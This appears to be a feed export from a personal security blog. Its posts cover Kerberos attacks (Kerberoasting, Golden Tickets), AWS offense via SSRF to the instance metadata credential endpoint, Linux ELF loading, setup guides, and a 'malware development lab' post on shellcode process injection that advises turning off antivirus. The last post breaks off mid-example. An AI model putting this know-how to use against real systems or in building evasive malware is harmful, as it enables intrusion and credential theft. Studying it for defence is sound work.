<p>Security groups are to grant permissions together, while OUs are to group objects with similar permissions. By searching about GPOs on the Windows start menu, you can set policies for multiple groups.</p>
<h3 id="heading-trees-forests-subdomaining">Trees, Forests, Subdomaining</h3>
<p>trees is to create subdomains out of an existing domains, forest is a collection of trees. interconnected trees need to have a trust-policy (which can be either one-way or two-way trust)</p>
<p><img src="https://fidelissecurity.com/wp-content/uploads/2024/05/Active-Directory-Structure.webp" alt="5 Common Mistakes in AD Recovery and How to Avoid Them | Fidelis Security" /></p>
<h2 id="heading-setting-up-a-local-lab">Setting up a Local lab</h2>
<p>You might need a specification of at least 16GBs of RAM and at least 256 GBs of SSD storage, if not possible locally, consider a Cloud-based setup on Azure/AWS</p>
<p>Here’s what you’ll need:</p>
<ol>
<li><p>Windows server 2019</p>
</li>
<li><p>Least 2 Windows 10 enterprise edition</p>
</li>
<li><p>One Attackbox VM (like Kali/Parrot)</p>
</li>
</ol>
<p>For Windows-based VMs, you can set aside 50-60GBs of disk space, and 25 GBs for the attackbox to enumerate and exploit your network. The server VM will act as the domain controller, while the enterprise VMs will act as client machines on the network. Please allocate at least 6 GBs of RAM to each and set the network type to NAT.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737381942641/b90a5505-9da5-4f04-b0f5-361bcd51fe92.png" alt class="image--center mx-auto" /></p>
<p>Alright, let’s dive into authentication next!</p>
<h2 id="heading-organs-of-kerberos">Organs of Kerberos</h2>
<p>We have 4 prime parts in the protocol: the user primarily, the domain controller consisting of the authentication server + ticket granting server and finally the resource or service provider.</p>
<p>The authentication server ensures that an existing and valid user is requesting a service, the ticket granting server authenticates the request for the particular service to the user.</p>
<h3 id="heading-symmetric-keys">Symmetric keys</h3>
<p>Kerberos uses symmetric key cryptography is validate, encrypt and decrypt messages. Here’s a cool chart for what kind of algorithm is supported:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737443448803/7ef962d7-70ea-41b4-a493-acb85a0e03cf.png" alt class="image--center mx-auto" /></p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Symmetric key cryptography is the process of using the same key to encrypt and decrypt a message</div>
</div>

<h3 id="heading-caches-and-key-tables">Caches and key tables</h3>
<p>Users have their own unique user cache that stores the service ticket used to access the service.</p>
<p>Authentication service has a table to match user ids with their respective client secret keys. Similar case for the ticket granting service.</p>
<p>Meanwhile, the service only holds the service cache which stores the user authenticator message.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">user authenticator is a message that holds the user_id trying to access the resource.</div>
</div>

<h2 id="heading-protocol-workflow">Protocol workflow</h2>
<p><img src="https://cdn.discordapp.com/attachments/725059333871632416/1333061681097605140/IMG-20250121-WA0004.jpg?ex=679d74af&amp;is=679c232f&amp;hm=7d4735f02204049a3a3f33f7a6c81beadf873b4ef0c9013c995c1264ce7731d4&amp;" alt="https://cdn.discordapp.com/attachments/725059333871632416/1333061681097605140/IMG-20250121-WA0004.jpg?ex=679d74af&amp;is=679c232f&amp;hm=7d4735f02204049a3a3f33f7a6c81beadf873b4ef0c9013c995c1264ce7731d4&amp;" /></p>
<p>The user sends a request for a “Ticket granting ticket” that can be sent to the TGS to get a service ticket. The auth service matches the user id with the respective client secret key (also ensuring if the user exists) and then sends back the TGT metadata encrypted with the client secret key and the TGT encrypted with the TGS secret key.</p>
<p>The user can only decode and check the acknowledgement from the TGT meta through the secret key generated by hashing the mentioned format in the diagram mentioned. (&lt;password&gt;&lt;user&gt;@something.com&lt;key version&gt;)</p>
<p>The user sends the user authenticator encrypted with the TGS session key from the TGT metadata, and the TGT which is still encrypted. The TGS now decrypts the TGT and checks the contents through the key stored in the TGS key table.</p>
<p>Now, the user receives the service metadata encrypted with TGS session key (which has a temporary fixed lifetime) along with the service ticket encrypted with a service secret key. Once again, the user can’t view the contents of the service ticket. The TGS session key now is used to help decrypt and acknowledge the service metadata. Finally, the service ticket is sent to the resource along with an User authenticator message encrypted with service session key received from the service meta-data.</p>
<p>Ultimately, we receive the service authentication and finally decrypt it through the service session key. And now we can use the service.</p>
<h2 id="heading-exploitation-techniques">Exploitation Techniques</h2>
<h3 id="heading-kerberoasting">Kerberoasting</h3>
<p>Kerberoasting exploits the Kerberos authentication process by targeting the service tickets issued by the Ticket Granting Service (TGS). During authentication, the TGS issues a service ticket encrypted with the service account's secret key (derived from its NTLM hash). While the user cannot view the contents of the ticket, the encrypted ticket is sent to the client. In a Kerberoasting attack, the attacker requests service tickets for specific services and captures them. Since the tickets are encrypted with the service's NTLM hash, they can be brute-forced offline to recover the service account's credentials, potentially gaining unauthorized access to privileged accounts.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737465544791/f23ae180-36e3-41c6-ab55-21595a180a0e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-golden-ticketing">Golden Ticketing</h3>
<p>Golden Ticketing is a powerful attack against Kerberos authentication that allows an attacker to create forged Ticket Granting Tickets (TGTs) for any user, including domain administrators, without needing their passwords. This attack exploits the Kerberos Key Distribution Center (KDC) secret, specifically the <strong>KRBTGT account hash</strong>, which is used to sign and encrypt all TGTs in a domain.</p>
<p>Here’s how it works:</p>
<ol>
<li><p><strong>Compromise the KRBTGT Hash</strong>: The attacker must first obtain the KRBTGT account's NTLM hash. This is typically done by gaining elevated privileges, such as Domain Admin access.</p>
</li>
<li><p><strong>Create a Forged TGT</strong>: Using tools like Mimikatz, the attacker creates a fake TGT for any user, embedding any permissions they desire, such as Domain Admin privileges.</p>
</li>
<li><p><strong>Authenticate Using the Forged TGT</strong>: The attacker injects the forged TGT into their session. Since the TGT is signed with the valid KRBTGT hash, the KDC treats it as legitimate, granting access to requested resources.</p>
</li>
</ol>
<p>Golden Ticketing provides attackers with persistent access, as even resetting user passwords won't invalidate the forged tickets. The only way to mitigate this attack is to reset the KRBTGT account password twice, invalidating all existing tickets.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737466107382/9ede2763-91cd-4874-aef2-0c5cbcd2980c.png" alt class="image--center mx-auto" /></p>
]]></content:encoded></item><item><title><![CDATA[Hacking your way back into Windows]]></title><description><![CDATA[This article is more like an emergency guide I made for both the readers and myself. The intended audience are those people who wanna install a copy of Windows 10/11 on a fresh SSD/HDD or switch from Linux to Windows in a Dual boot/Clean install conf...]]></description><link>https://blog.berzi.one/hacking-your-way-back-into-windows</link><guid isPermaLink="true">https://blog.berzi.one/hacking-your-way-back-into-windows</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 16 Jan 2025 13:15:17 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961650511/d310f74b-da76-4618-b570-bb3848ad13b7.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This article is more like an emergency guide I made for both the readers and myself. The intended audience are those people who wanna install a copy of Windows 10/11 on a fresh SSD/HDD or switch from Linux to Windows in a Dual boot/Clean install configuration.</p>
<h2 id="heading-this-wasnt-hacking-until-it-was">This wasn’t Hacking, until it was…</h2>
<p>Why “Hacking”? That’s coz Microsoft loves to make things complicated! Traditional ISO flashes like Balena etcher, Popsicle nowdays won’t support making a windows bootable USB. Hence you’re left with usually two most efficient methods to create a bootable USB:</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">An ISO, also called the “image file” is a file with an extension of “.iso” that contains the installation wizard to install the specific OS into your system</div>
</div>

<ol>
<li><p>Install Ventoy, flash it into the USB, drag and drop your windows ISO into the USB drive… OR</p>
</li>
<li><p>Create a Windows VM (which is thankfully easy to setup), install Rufus, give the VM access to the USB drive, then flash the ISO into the drive directly through Rufus.</p>
</li>
</ol>
<p>Now we got our USB drive, what next? Drivers! Why? Because Windows won’t detect your drive without them, and without detection, you won’t be able to install your OS! I’ll target two kinds of drivers: one from Intel, and one from AMD.</p>
<h2 id="heading-drivers-driving-us-insane">Drivers driving us insane</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737032398450/f51c6303-a5ec-4049-b07a-7c5e0901b0c9.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737032468051/e3314013-6f76-4378-8094-acb13c0eae9f.png" alt class="image--center mx-auto" /></p>
<p>For either of these, install the respective <code>.exe</code> file, on a Windows VM. This will create the driver files and save them in your system, organize them inside a folder and store them in a flash drive.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">a VM or a Virtual Machine is an OS that can run over your main OS. These can be managed through hypervisors like VirtualBox and VMWare Pro (Try Googling).</div>
</div>

<h2 id="heading-double-usb-ninja-technique">Double USB ninja technique!!!</h2>
<p>Now you gotta go ninja mode. Plug the first USB drive made bootable with Windows 10, set the boot priority to make sure you boot into the USB drive. After the installation wizard starts, select “Custom Install”, then see if any drives are being detected, if not, click “Load drivers”. You might come across this screen…</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/0*4_SGhxNySIful9_5.png" alt="Troubleshooting windows installation error “No device drivers were found.”  | by Syed Hasan | Medium" /></p>
<p>Now plug in your second flash drive containing the drivers, click “browse”, and then recurse through the files of that flash drive until you reach the “VMD” folder inside the driver files (that’s for Intel’s case at least). Select it, load and you’ll be able to see the drives now! Continue with your installation, and you should smoothly be able to setup Windows 10 from scratch now. (Also, please update your system clock and install Windows Updates to make sure you get the required firmware, security patches and other drivers)</p>
]]></content:encoded></item><item><title><![CDATA[Playing Offense: AWS Edition]]></title><description><![CDATA[Access methods
Before we talk about the services, we need to talk about how authentication is done. One method is through AWS’s own GUI dashboard where you can either login as an IAM user or a root user (basically the dude with admin privileges). Thi...]]></description><link>https://blog.berzi.one/playing-offense-aws-edition</link><guid isPermaLink="true">https://blog.berzi.one/playing-offense-aws-edition</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sat, 04 Jan 2025 14:12:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961741390/432e8cb0-699f-40f3-ac93-4ad1b1fc2030.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-access-methods">Access methods</h2>
<p>Before we talk about the services, we need to talk about how authentication is done. One method is through AWS’s own GUI dashboard where you can either login as an IAM user or a root user (basically the dude with admin privileges). This does require stuff like <strong>IAM user ID, email, passwords,</strong> etc.</p>
<p>Whereas when we are dealing with the <strong>AWS CLI</strong> it is much simpler, we have an <strong>Access key ID, Security token</strong> for long-term access and an additional <strong>session token</strong> for short term access.</p>
<h2 id="heading-iam">IAM</h2>
<p><img src="https://digitalcloud.training/wp-content/uploads/2022/02/iam-authentication-methods.png" alt="AWS Identity and Access Management | AWS Cheat Sheet" /></p>
<p>Very similar to Linux, users are nothing but profiles made for individuals, more on that as we progress through this article. IAM stands for Identity and Access Management (which is obviously managing people and authorisation in simple terms). <strong>Groups</strong> on the other hand is a collective of users with defined persmissions. Most entities in IAM relate to grouping of entities and assigning sets of permissions. When it’s short-term, we use IAM roles to allocate perms to these users. When we need temporary roles, we use <strong>Assumed Roles</strong>. Now how do we define permissions? We got <strong>policies</strong>. It’s basically a JSON file that defines a blueprint of all the permissions you need to allocate to an entity what services and to what extent that entity can access things…</p>
<p>example policy for full access to an AWS S3 bucket…</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"Version"</span>: <span class="hljs-string">"2012-10-17"</span>,
    <span class="hljs-attr">"Statement"</span>: [
        {
            <span class="hljs-attr">"Effect"</span>: <span class="hljs-string">"Allow"</span>,
            <span class="hljs-attr">"Action"</span>: <span class="hljs-string">"s3:*"</span>,
            <span class="hljs-attr">"Resource"</span>: <span class="hljs-string">"*"</span>
        }
    ]
}
</code></pre>
<h2 id="heading-vulnerabilities">Vulnerabilities</h2>
<p><img src="https://d2908q01vomqb2.cloudfront.net/e1822db470e60d090affd0956d743cb0e7cdf113/2020/11/27/Amazon-S3-Featured-Image.png" alt="Limit access to Amazon S3 buckets owned by specific AWS accounts | AWS  Storage Blog" /></p>
<p>Vulnerabilities in AWS based sites often start with open S3 buckets (which are persistent data storages often for anybody to access). You can get a list open S3 buckets through various tools online.</p>
<p>Now, we need to search for how to get access to the buckets, it can be through SSRF where we can employ various tactics like os command injection, open redirects, etc. Usually the credentials are stored in the <code>http://169.254.169.254/latest/meta-data</code> path whose IP address comes from the reserved <a target="_blank" href="https://en.wikipedia.org/wiki/Link-local_address">IPv4 Link Local Address</a> <a target="_blank" href="https://en.wikipedia.org/wiki/Link-local_address">space</a> which can only be accessed from within that instance’s network.</p>
<h3 id="heading-enumeration-through-llms">Enumeration through LLMs</h3>
<p>Now, once we get the credentials it’s time to authenticate and then view all sorts of IAM users, roles, policies. I’m lazy so I like to form complex queries through LLMs like ChatGPT.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735999587824/09b2940a-c33a-48fd-b157-3c970981e327.png" alt class="image--center mx-auto" /></p>
<p>It is possible to look for privilege escalation chances through the <code>pacu</code> tool. But since the enumerative functions of <code>pacu</code> take too long, sometimes it’s better to manually explore what’s out there through the AWS cli and some Google Dorking.</p>
<p><img src="https://rhinosecuritylabs.com/wp-content/uploads/2023/10/image5-1000x645.png" alt="Attacking AWS Cognito with Pacu (p2) - Rhino Security Labs" /></p>
]]></content:encoded></item><item><title><![CDATA[The Penguin & the ELF]]></title><description><![CDATA[Surfing the Linux kernel
Syscalling for execution
the exec system call has many types (as shown in the diagram) but here, we’ll be discussing a summarized overview of how these work. Basically we dealing with executing binaries or scripts through the...]]></description><link>https://blog.berzi.one/the-penguin-the-elf</link><guid isPermaLink="true">https://blog.berzi.one/the-penguin-the-elf</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Mon, 30 Dec 2024 16:03:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961927870/cedccf58-da26-43b8-b998-47c9fe09b685.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-surfing-the-linux-kernel">Surfing the Linux kernel</h2>
<h3 id="heading-syscalling-for-execution">Syscalling for execution</h3>
<p>the <code>exec</code> system call has many types (as shown in the diagram) but here, we’ll be discussing a summarized overview of how these work. Basically we dealing with executing binaries or scripts through the Linux kernel here through exec and its similar syscalls. But before we understand how such syscalls are defined in Linux source code, we need to understand one thing: <strong>pointers</strong></p>
<p>pointers are variables that point to or store the memory address of another variable. Hence they “point to” the data of that variable.</p>
<p>Here’s an example of <code>execve</code> definition:</p>
<pre><code class="lang-c">
SYSCALL_DEFINE3(execve,
<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> __user *, filename,
<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> __user *<span class="hljs-keyword">const</span> __user *, argv,
<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> __user *<span class="hljs-keyword">const</span> __user *, envp)
{
<span class="hljs-keyword">return</span> do_execve(getname(filename), argv, envp);
}
</code></pre>
<p>This is a 3 argument definition, now why i mentioned pointers before is crucial to understanding the arguments. <code>const char __user *const __user *</code> means we are defining a pointer in kernel space that points to a constant valued pointer defined in user space that points to a character in user space. <code>argv</code> is the array of arguments and similarly <code>envp</code> is the array of environment variables (like PATH)</p>
<h3 id="heading-binary-format-handlers-and-linuxbinprm-struct">Binary format handlers and <code>linux_binprm</code> struct</h3>
<p>When we are loading the executable, a struct (or user-defined data structure that can store multiple basic data types) called <code>linux_binprm</code> is created to store the metadata about that executable, like argument and env variable counts, filename, and then a buffer that will store (presently) the heading 256 bits of that file for identification of the binary format.</p>
<p>To identify the binary format, we have pointers known as binary format handlers, these are defined in files under the <code>fs</code> directory in the kernel source tree, and we iterate through these binfmt handlers to check which one matches the information in <code>linux_binprm</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735569458066/ae1754ae-7c41-413f-82dd-47b89fda2ae0.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-kernel-modules">Kernel modules</h3>
<p>Kernel mods are extensible chunks of code that can add to an existing kernel’s features. We can add our own binfmt handlers through kernel modules.</p>
<p>Fancy things aside, here’s a diagram of files, libraries in the Linux source tree that determine what does what when it comes to dealing with executables.</p>
<h2 id="heading-security-security-security">Security, Security, SECURITY!!!</h2>
<p>We have a few security checks in the entire process before and after loading the executable.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735570290785/ec865b64-b513-4c6f-89ab-dc06593d5b49.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-httpsnvdnistgovvulndetailcve-2009-0029httpsnvdnistgovvulndetailcve-2009-0029"><a target="_blank" href="https://nvd.nist.gov/vuln/detail/CVE-2009-0029">https://nvd.nist.gov/vuln/detail/CVE-2009-0029</a></h2>
<h2 id="heading-magical-elfs">Magical ELFs</h2>
<p><img src="https://blog.cloudflare.com/content/images/2021/03/segments-sections.png" alt="How to execute an object file: Part 1 | Noise" /></p>
<p>ELFs stand for Executable and Linkable formats, they are one of the most common executables in Linux.</p>
<p>Some parts:</p>
<ul>
<li><p>ELF Header: contains metadata about entry point, instruction-set, dynamic/static linking instructions, etc.</p>
</li>
<li><p>Program Header Table/Segments table: how to load and execute during runtime.</p>
</li>
<li><p>Section Header: contains info about sections of the PE (portable executable) for better debugging and organisation</p>
</li>
</ul>
<p>The program header tables contains a series of entries with header types, here are the common ones:</p>
<ul>
<li><p>PT_LOAD: Data info to be loaded</p>
</li>
<li><p>PT_NOTE: Metadata (copyright, version)</p>
</li>
<li><p>PT_DYNAMIC: dynamic linking info</p>
</li>
<li><p>PT_INTERP: ELF interpreter path</p>
</li>
</ul>
<p>Let’s talk about the parts mentioned in the Section Header:</p>
<ol>
<li><p>.text: the <code>.text</code> section typically contains the <strong>executable code</strong> of the program. It is where the compiled instructions reside, and this section is loaded into memory during program execution.</p>
</li>
<li><p>.data: global variables, static variables</p>
</li>
<li><p>.bss: local variables</p>
</li>
<li><p>.rodata: read-only globals</p>
</li>
</ol>
<h3 id="heading-static-vs-dynamic-linking">Static Vs. Dynamic Linking</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735570745713/e0b28295-ee9f-4ced-9dc6-d4b26627becf.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-dynamic-linking-and-dlls">Dynamic Linking and DLLs</h3>
<p>On Linux, libraries that are used for Dynamic Linking are saved as <code>.so</code> (shared object) files. Whereas on Windows, we call them <code>.dll</code> (dynamic link libraries)</p>
<p>When executing, the OS figures out what libraries are needed by going through the ELF Header and Program Header Table. If the program is dynamically linked, we need to deal with another program called the “ELF interpreter”. When loaded, the kernel pushes arguments and env variables into a process stack and sets a pointer to the start of executable code then the syscall is made. Registers are cleared, Kernel stores current register values to another stack before the syscall though. After the syscall, the kernel returns to user space and restores the register values from that stack and jumps to the stored instruction pointer in userspace. NOW, the ELF interpreter is executed and current process is replaced. Everything cycles for this one as well.</p>
]]></content:encoded></item><item><title><![CDATA[🐍🌱 Setting Up Miniconda: Your Essential Guide to Conda on Linux 💻]]></title><description><![CDATA[🚀 Embark on Efficient Resource Management with SLURM!
Welcome, fellow developers and researchers, to the realm of efficient resource management powered by SLURM! 🌟 If you've ever found yourself lost amidst the labyrinth of job steps and Python envi...]]></description><link>https://blog.berzi.one/setting-up-miniconda-your-essential-guide-to-conda-on-linux</link><guid isPermaLink="true">https://blog.berzi.one/setting-up-miniconda-your-essential-guide-to-conda-on-linux</guid><category><![CDATA[#SLURM #HPC (High-Performance Computing) #ClusterManagement #JobScheduling #Miniconda #PythonEnvironments #MachineLearning #DataScience #ComputationalScience #ResearchTools]]></category><dc:creator><![CDATA[Yash Mehrotra]]></dc:creator><pubDate>Fri, 10 May 2024 06:39:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1715286115628/8035e669-9507-4d9f-b4ff-8daf04c96e5b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-embark-on-efficient-resource-management-with-slurm">🚀 <strong>Embark on Efficient Resource Management with SLURM!</strong></h2>
<p>Welcome, fellow developers and researchers, to the realm of efficient resource management powered by SLURM! 🌟 If you've ever found yourself lost amidst the labyrinth of job steps and Python environment management, fret not! Today, I'm thrilled to be your guide as we demystify the process of setting up Miniconda on your SLURM cluster. 🐍🔧 With Miniconda at your disposal, you'll wield the ability to effortlessly create and manage tailored virtual environments, perfectly suited for your machine learning endeavors. Gone are the days of sweating over configuration complexities; let's streamline your workflow and unlock the true potential of your SLURM cluster.</p>
<p>Ready to embark on this journey? Let's dive in and empower your development experience like never before!</p>
<ul>
<li><p>Step 1: Download the Miniconda installation script using the command:</p>
<pre><code class="lang-bash">  curl -O https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
</code></pre>
</li>
<li><p>Step 2: Make the script executable:</p>
<pre><code class="lang-bash">  chmod +x Miniconda3-latest-Linux-x86_64.sh
</code></pre>
</li>
<li><p>Step 3: Run the installation script and follow the prompts:</p>
<pre><code class="lang-bash">  ./Miniconda3-latest-Linux-x86_64.sh
</code></pre>
</li>
<li><p>Step 4: Add Miniconda to your PATH by updating your .bashrc file:</p>
<pre><code class="lang-bash">  <span class="hljs-built_in">echo</span> <span class="hljs-string">'PATH="/path/to/miniconda3/bin:$PATH"'</span> &gt;&gt; ~/.bashrc
</code></pre>
<p>  The path will be specific to your system configuration. Replace <code>/path/to/miniconda3/bin</code> with the actual path to the Miniconda3 bin directory on your machine.</p>
</li>
<li><p>Step 5: Activate the changes:</p>
<pre><code class="lang-bash">  <span class="hljs-built_in">source</span> ~/.bashrc
</code></pre>
<p>  Now that Miniconda is up and running, let's initialize conda and get ready to supercharge our development workflow! 🎉</p>
</li>
<li><p>Now you need to type the following command to activate the conda in you system :</p>
<pre><code class="lang-bash">  conda init
</code></pre>
<p>  <strong>After running the above command, please close the terminal and reopen a new one. Then, you'll be ready to use conda.</strong></p>
</li>
</ul>
<h2 id="heading-congratulations-youre-ready-to-roll">🎉 <strong>Congratulations! You're Ready to Roll</strong></h2>
<p>With Miniconda in place, you have the power to create tailored virtual environments for each of your machine learning projects. This flexibility ensures optimal performance and reproducibility in your workflows. Happy coding! 💻✨</p>
<h2 id="heading-additional-tips"><strong>Additional Tips :</strong></h2>
<ul>
<li><p><strong>Create Environments:</strong> Use <code>conda create --name myenv</code> to create a new environment.</p>
</li>
<li><p><strong>Activate Environment:</strong> Activate an environment with <code>conda activate myenv</code>.</p>
</li>
<li><p><strong>Install Packages:</strong> Install packages with <code>conda install package_name</code>.</p>
</li>
<li><p><strong>List Environments:</strong> List all environments with <code>conda env list</code>.</p>
</li>
</ul>
<p><strong>Explore the vast ecosystem of libraries and tools available through Miniconda to supercharge your development workflow.</strong></p>
]]></content:encoded></item><item><title><![CDATA[🔥Setting up Malware development Lab]]></title><description><![CDATA[Specifications and setup:
You need a pretty solid rig for development and testing across different platforms. Also, you will need heavyweight development tools (which will be mentioned later on). Anyways, here are some recommended specifications for ...]]></description><link>https://blog.berzi.one/setting-up-malware-development-lab</link><guid isPermaLink="true">https://blog.berzi.one/setting-up-malware-development-lab</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Mon, 22 Apr 2024 12:31:01 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1712671527377/edd6789d-1ab8-4aad-897a-db05808fa800.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-specifications-and-setup">Specifications and setup:</h2>
<p>You need a pretty solid rig for development and testing across different platforms. Also, you will need heavyweight development tools (which will be mentioned later on). Anyways, here are some recommended specifications for a system for malware development:</p>
<ul>
<li><p>Least 16GBs of DDR4/5 RAM</p>
</li>
<li><p>Least 6 core CPU with 10+ threads</p>
</li>
<li><p>1TB/512GB SSD/HDD (SSD preferred tho)</p>
</li>
<li><p>Good cooling system</p>
</li>
</ul>
<p>Ideally, a gaming laptop or rig would help you achieve this, or you can simply use cloud VMs on Linode to prepare a lab.</p>
<p>Here are the tools that you may require for the lab:</p>
<ul>
<li><p>Visual Studio 20xx (community/professional)</p>
</li>
<li><p>Oracle Virtualbox/VMware workstation player</p>
</li>
<li><p>Kali Linux</p>
</li>
<li><p>Windows 10/11</p>
</li>
<li><p>Process Hacker</p>
</li>
<li><p>x64dbg</p>
</li>
</ul>
<h2 id="heading-fundamentals">Fundamentals</h2>
<p>Firstly you should be knowing that <strong>malware is usually made for windows-based</strong> systems. So we will be focusing on developing malware that is meant to <strong>work with windows</strong>. For that we need to know how to manipulate things like threads and processes in windows. A great place to start would be the <strong>Win32</strong> API. This helps you program windows to do certain tasks, from both high and low level perspectives.</p>
<p>Also, make sure you are familiar with:</p>
<ul>
<li><p>windows-fundamentals (also would REALLY help if you've ever used windows in your life before).</p>
</li>
<li><p>C language and bit of assembly</p>
</li>
<li><p>metasploit-framework</p>
</li>
<li><p>virtualization (coz we ain't detonating malware on our own computer)</p>
</li>
</ul>
<p>The best way to learn something is by trying it out first then going deeper theory wise. That being said, let's build malware... (Oh and btw,don't forget to turn off all AVs while building or running it)</p>
<h3 id="heading-the-windows-api">The Windows API</h3>
<p>Understanding the Windows API is crucial since a lot of malware is written in it. It exploits the NT API which is an undocumented API of windows.</p>
<p>Usually the functions obey the convention of &lt;data-type&gt;&lt;function name&gt;, you can notice the trend in the list given below. Also, the function names themselves are pretty self explanatory.</p>
<p>Here's a list of stuff you need to remember:</p>
<pre><code class="lang-plaintext">DWORD = int32
SIZE_T = SIZEOF(object)
VOID = VOID
PVOID = Pointer to 32-bit variable
HANDLE = variable for object
HMODULE = handle for module 
PCSTR = constant character pointer
PSTR = chartacter pointer
PHANDLE = Handle pointer
CreateFileA = Create a file (ANSI)
CreateFileW = Create a file (Unicode)
</code></pre>
<h3 id="heading-process-injection-shellcode-based">Process Injection (Shellcode based)</h3>
<p>Shellcode is compiled code written in machine language, that in malware language attempts to make itself run on the system by activities like injecting it into a process.</p>
<p>We can write our own shellcode by compiling our C code. Or we can let tools like <code>msfvenom</code> do the job.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1713788226213/7f08d6c5-4f82-4742-b90d-f9ccd0cbebe4.png" alt class="image--center mx-auto" /></p>
<p>Here's how process injection works in layman terms. We grab a process that's already running, then proceed to capture its process ID (which makes it unique). Now, under the same process ID, we allocate part of the memory. Then we inject shellcode into it. Then, we run it through starting a thread (consider a thread like a candle wick which lights up when started)</p>
<p>So, while the original process is running, our shellcode runs along with it in the background.</p>
<p>if you want to check out an example on shellcode injection, see my repo <a target="_blank" href="https://github.com/spirizeon/rootblast">RootBlast</a></p>
<h2 id="heading-problems-with-writing-malware">Problems with writing malware</h2>
<ul>
<li><p>It's difficult to find resources, mostly it'll be blogs and articles because mainstream platforms ban such content</p>
</li>
<li><p>You need to study a LOT about OS related stuff, especially windows</p>
</li>
<li><p>You may get arrested (Ok, that's a joke, unless you're not careful)</p>
</li>
<li><p>AV/EDRs are constantly evolving so reading about how to make your malware undetectable is a must</p>
</li>
</ul>
<h2 id="heading-on-the-next-issue">On the next issue</h2>
<p>I'll talk about some more types of malware and also AV/EDR evasion techniques. Thank you for reading.</p>
<h2 id="heading-resources">Resources</h2>
<ul>
<li><p><a target="_blank" href="https://www.crow.rip/crows-nest/mal/dev/getting-started">https://www.crow.rip/crows-nest/mal/dev/getting-started</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/r3p3r/nixawk-awesome-windows-exploitation">https://github.com/r3p3r/nixawk-awesome-windows-exploitation</a></p>
</li>
<li><p><a target="_blank" href="https://scholar.google.com/">https://scholar.google.com/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🕷️ Web Pen-testing strategies]]></title><description><![CDATA[In this blog, we will discuss most concepts concerning and related to web app security. Things like Auth-bypass, SSRF,etc. Massive thanks to portswigger for the inspiration.
WAPT in a nutshell
WAPT is nothing but looking for faults in the backend sys...]]></description><link>https://blog.berzi.one/zysec-recharged-month-1</link><guid isPermaLink="true">https://blog.berzi.one/zysec-recharged-month-1</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Fri, 29 Mar 2024 11:00:32 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1712345353782/bebaa827-df90-4d49-a68e-198c89f7027a.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In this blog, we will discuss most concepts concerning and related to web app security. Things like Auth-bypass, SSRF,etc. Massive thanks to portswigger for the inspiration.</p>
<h2 id="heading-wapt-in-a-nutshell">WAPT in a nutshell</h2>
<p>WAPT is nothing but looking for faults in the backend system of the application and then exploiting it. We use several tools like fuzzers, proxies and vulnerability scanners for this (I'll get into that later).</p>
<h2 id="heading-tools-for-wapt">Tools for WAPT</h2>
<h3 id="heading-fuzzers">Fuzzers</h3>
<p>Fuzzers are applications that can send the same request repetitively with minor edits. The edits are taken from an existing wordlist. Let's say we have a URL:</p>
<pre><code class="lang-plaintext">https://website.com/
</code></pre>
<p>Now we need to find the various API endpoints for this. So we will use a fuzzer to send requests with various edits to the website URL and hope for a success return code. (Here are the HTTP return codes for reference)</p>
<p><em>HTTP Return codes (Signals of API responses)</em></p>
<ul>
<li><p>2xx - Success</p>
</li>
<li><p>3xx - Redirection</p>
</li>
<li><p>4xx - Client side error</p>
</li>
<li><p>5xx - Server side error</p>
</li>
</ul>
<p>the fuzzer will use a wordlist that may be something like this:</p>
<pre><code class="lang-plaintext">v2
swagger
control-panel
...
</code></pre>
<p>Now the requests being sent will look like this</p>
<pre><code class="lang-plaintext">GET https://website.com/api/v2 [RETURN CODE 403]
GET https://website.com/api/swagger [RETURN CODE 403]
#this one exists!
